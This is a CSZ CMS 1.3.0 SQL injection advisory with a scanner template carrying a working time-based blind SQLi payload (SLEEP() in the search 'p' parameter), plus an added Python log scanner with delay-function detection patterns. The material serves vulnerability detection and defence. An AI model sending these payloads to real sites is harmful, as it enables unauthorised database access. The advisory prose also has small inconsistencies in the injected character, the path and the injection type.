Vulnerability description
First, go to the CSZ CMS web page.
Then go to the directory at http://yourhost/plugin/articleCMS.
To see the error-based SQLi vulnerability, enter the “” character in the search section.
The “p” parameter was determined to cause the vulnerability.
The database can be accessed with manual or automated tools.
id: csz-cms-multiple-blind-sql-injection
info:
  name: CSZCMS V1.3.0 - 'Multiple' Blind SQLi
  author: Dogukan Dincer
  severity: critical
  verified: false
  description: |
    First, go to the CSZ CMS web page.
    Then go to the directory at http://yourhost/plugin/articleCMS.
    To see the error-based SQLi vulnerability, enter the “” character in the search section.
    The “p” parameter was determined to cause the vulnerability.
    The database can be accessed with manual or automated tools.
  reference:
    - https://www.exploit-db.com/exploits/50899
  tags: csz,cms,sql
  created: 2024/03/16
rules:
  r0:
    request:
      method: GET
      path: /plugin/article/search?p=1%27%22)%20AND%20(SELECT%203910%20FROM%20(SELECT(SLEEP(10)))qIap)--%20ogLS
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'CSZ CMS') &&
      response.latency <= 12000 &&
      response.latency >= 10000
  r1:
    request:
      method: GET
      path: /plugin/article/search?p=1%27%22)%20AND%20(SELECT%203910%20FROM%20(SELECT(SLEEP(6)))qIap)--%20ogLS
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'CSZ CMS') &&
      response.latency <= 8000 &&
      response.latency >= 6000
  r2:
    request:
      method: GET
      path: /plugin/article/search?p=1%27%22)%20AND%20(SELECT%203910%20FROM%20(SELECT(SLEEP(10)))qIap)--%20ogLS
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'CSZ CMS') &&
      response.latency <= 12000 &&
      response.latency >= 10000
  r3:
    request:
      method: GET
      path: /plugin/article/search?p=1%27%22)%20AND%20(SELECT%203910%20FROM%20(SELECT(SLEEP(6)))qIap)--%20ogLS
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'CSZ CMS') &&
      response.latency <= 8000 &&
      response.latency >= 6000
expression: r0() && r1() && r2() && r3()
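As an added defender-side example (not part of the scan template above or of the CSZ CMS project): a small Python access-log scanner that flags requests to the article search endpoint whose "p" parameter carries a SLEEP() time-delay probe like the template's payload, and marks a finding as confirmed when the logged request time is at least as long as the requested delay, which is the same latency-window reasoning the template's expressions rely on. The log format, sample lines, client addresses and request times are constructed for this example.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed access-log lines. Assumed format (not a real server's default):
#   client "METHOD path HTTP/x.y" status request_time_ms
# The probe paths are the ones used by the scan template; the last probe is
# logged with a short request time, i.e. the delay did not execute.
SAMPLE_LOG = """\
10.0.0.5 "GET /plugin/article/search?p=1 HTTP/1.1" 200 120
10.0.0.9 "GET /plugin/article/search?p=1%27%22)%20AND%20(SELECT%203910%20FROM%20(SELECT(SLEEP(10)))qIap)--%20ogLS HTTP/1.1" 200 10240
10.0.0.9 "GET /plugin/article/search?p=1%27%22)%20AND%20(SELECT%203910%20FROM%20(SELECT(SLEEP(6)))qIap)--%20ogLS HTTP/1.1" 200 6190
10.0.0.7 "GET /index.php HTTP/1.1" 200 45
10.0.0.9 "GET /plugin/article/search?p=hello%20world HTTP/1.1" 200 98
10.0.0.9 "GET /plugin/article/search?p=1%27%22)%20AND%20(SELECT%203910%20FROM%20(SELECT(SLEEP(10)))qIap)--%20ogLS HTTP/1.1" 200 131
"""

LOG_RE = re.compile(r'^(\S+) "(\S+) (\S+) HTTP/[\d.]+" (\d{3}) (\d+)$')

# Time-delay primitives used by blind SQLi probes; the template uses MySQL SLEEP().
DELAY_RE = re.compile(r'\b(?:sleep|benchmark|pg_sleep)\s*\(', re.IGNORECASE)
SLEEP_ARG_RE = re.compile(r'\bsleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)', re.IGNORECASE)

# Endpoint the template targets.
SEARCH_PATH = "/plugin/article/search"


def parse_line(line):
    """Parse one constructed log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, method, target, status, ms = m.groups()
    return {"client": client, "method": method, "target": target,
            "status": int(status), "latency_ms": int(ms)}


def decode_param(target, name):
    """Return all values of query parameter `name`, decoded a second time so
    double-encoded probes (%2527 for %27) are seen in clear as well."""
    query = urlsplit(target).query
    return [unquote_plus(v) for v in parse_qs(query, keep_blank_values=True).get(name, [])]


def extract_delay_seconds(value):
    """Requested SLEEP() duration in seconds, or None if no SLEEP(n) is present."""
    m = SLEEP_ARG_RE.search(value)
    return float(m.group(1)) if m else None


def classify(entry):
    """Return a finding for a time-based SQLi probe against the search
    endpoint, or None for ordinary traffic."""
    if urlsplit(entry["target"]).path != SEARCH_PATH:
        return None
    for value in decode_param(entry["target"], "p"):
        if not DELAY_RE.search(value):
            continue
        delay_s = extract_delay_seconds(value)
        # Corroboration: a request time at or above the requested sleep means
        # the delay ran inside the database, i.e. the injection succeeded.
        confirmed = delay_s is not None and entry["latency_ms"] >= delay_s * 1000
        return {"client": entry["client"], "delay_s": delay_s,
                "latency_ms": entry["latency_ms"], "confirmed": confirmed}
    return None


def scan_log(text):
    """Run classify() over every parsable line and collect the findings."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        finding = classify(entry)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        state = "CONFIRMED" if f["confirmed"] else "attempt"
        print(f"{state}: {f['client']} sleep={f['delay_s']}s latency={f['latency_ms']}ms")
```

A finding marked confirmed is the one worth paging on: it means the injected SLEEP() actually ran, so the parameter is exploitable on that host, whereas an unconfirmed attempt only tells you someone is probing.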